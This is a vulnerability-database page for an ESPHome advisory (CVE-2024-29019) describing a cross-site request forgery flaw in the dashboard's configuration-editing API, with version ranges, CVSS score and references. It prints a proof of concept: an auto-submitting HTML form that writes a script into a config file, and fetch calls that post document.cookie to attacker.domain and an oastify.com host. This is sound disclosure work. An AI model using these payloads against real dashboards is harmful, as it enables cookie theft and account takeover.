GHSA-5925-88XH-6H99

Vulnerability from github – Published: 2024-03-21 16:26 – Updated: 2024-04-11 14:40
VLAI?
Summary
ESPHome vulnerable to Authentication bypass via Cross site request forgery
Details

Summary

API endpoints in dashboard component of ESPHome version 2023.12.9 (command line installation) are vulnerable to Cross-Site Request Forgery (CSRF) allowing remote attackers to carry out attacks against a logged user of the dashboard to perform operations on configuration files (create, edit, delete).

Details

It is possible for a malicious actor to create a specifically crafted web page that triggers a cross site request against ESPHome, this allows bypassing the authentication for API calls on the platform.

PoC

An example of malicious web page that abuses this vulnerability:

document.forms[0].submit();

In which an attacker creates and weaponizes "poc.yaml" config file containing a cookie exfiltration script and forces the payload triggering visiting the vulnerable page.

Example of such script:

fetch('https://attacker.domain', { method: 'POST', mode: 'no-cors', body:document.cookie });

Impact

This vulnerability allows bypassing authentication on API calls accessing configuration file operations on the behalf of a logged user. In order to trigger the vulnerability, the victim must visit a weaponized page.

In addition to this, it is possible to chain this vulnerability with GHSA-9p43-hj5j-96h5 (as seen in the PoC) to obtain a complete takeover of the user account.

Severity ?
8.1 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "esphome"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2023.12.9"
            },
            {
              "fixed": "2024.3.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-29019"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-352"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-03-21T16:26:35Z",
    "nvd_published_at": "2024-04-11T01:25:11Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nAPI endpoints in dashboard component of ESPHome version 2023.12.9 (command line installation) are vulnerable to Cross-Site Request Forgery (CSRF) allowing remote attackers to carry out attacks against a logged user of the dashboard to perform operations on configuration files (create, edit, delete).\n\n### Details\nIt is possible for a malicious actor to create a specifically crafted web page that triggers a cross site request against ESPHome, this allows bypassing the authentication for API calls on the platform.\n\n### PoC\nAn example of malicious web page that abuses this vulnerability:\n\n\n\u003chtml\u003e\n  \u003cbody\u003e\n\t\u003cform action=\"http://localhost:6052/edit?configuration=poc.yaml\" id=\"#main\" method=\"POST\" enctype=\"text/plain\" onsubmit=\"setTimeout(function () { window.location.reload(); }, 10)\"\u003e\n  \t\u003cinput type=\"hidden\" name=\"\u0026lt;script\u0026gt;\u0026#13;\u0026#10;fetch\u0026#40;\u0026apos;https\u0026#58;\u0026#47;\u0026#47;907zv9yp9u3rjerkiakydpvcr3xulk99\u0026#46;oastify\u0026#46;com\u0026#63;x\" value=\"y\u0026apos;\u0026#44;\u0026#32;\u0026#123;\u0026#13;\u0026#10;method\u0026#58;\u0026#32;\u0026apos;POST\u0026apos;\u0026#44;\u0026#13;\u0026#10;mode\u0026#58;\u0026#32;\u0026apos;no\u0026#45;cors\u0026apos;\u0026#44;\u0026#13;\u0026#10;body\u0026#58;document\u0026#46;cookie\u0026#13;\u0026#10;\u0026#125;\u0026#41;\u0026#59;\u0026#13;\u0026#10;\u0026lt;\u0026#47;script\u0026gt;\u0026#13;\u0026#10;\" /\u003e\n\t\u003c/form\u003e\n\n\t\u003cscript\u003e\n  \tdocument.forms[0].submit();\n\t\u003c/script\u003e\n\n\t\u003cscript\u003e\n\t\u003c/script\u003e\n  \u003c/body\u003e\n\u003c/html\u003e\n\nIn which an attacker creates and weaponizes \"poc.yaml\" config file containing a cookie exfiltration script and forces the payload triggering visiting the vulnerable page.\n\n\nExample of such script:\n\u003cscript\u003e\nfetch(\u0027https://attacker.domain\u0027, {\nmethod: \u0027POST\u0027,\nmode: \u0027no-cors\u0027,\nbody:document.cookie\n});\n\u003c/script\u003e\n\n\n### Impact\nThis vulnerability allows bypassing authentication on API calls accessing configuration file operations on the behalf of a logged user. In order to trigger the vulnerability, the victim must visit a weaponized page.\n\nIn addition to this, it is possible to chain this vulnerability with GHSA-9p43-hj5j-96h5 (as seen in the PoC) to obtain a complete takeover of the user account.\n\n",
  "id": "GHSA-5925-88xh-6h99",
  "modified": "2024-04-11T14:40:50Z",
  "published": "2024-03-21T16:26:35Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/esphome/esphome/security/advisories/GHSA-5925-88xh-6h99"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29019"
    },
    {
      "type": "WEB",
      "url": "https://github.com/esphome/esphome/pull/6396"
    },
    {
      "type": "WEB",
      "url": "https://github.com/esphome/esphome/pull/6397"
    },
    {
      "type": "WEB",
      "url": "https://github.com/esphome/esphome/commit/c56c40cb824e34ed2b89ba1cb8a3a5eb31459c74"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-9p43-hj5j-96h5"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/esphome/esphome"
    },
    {
      "type": "WEB",
      "url": "https://github.com/esphome/esphome/releases/tag/2024.3.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "ESPHome vulnerable to Authentication bypass via Cross site request forgery"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.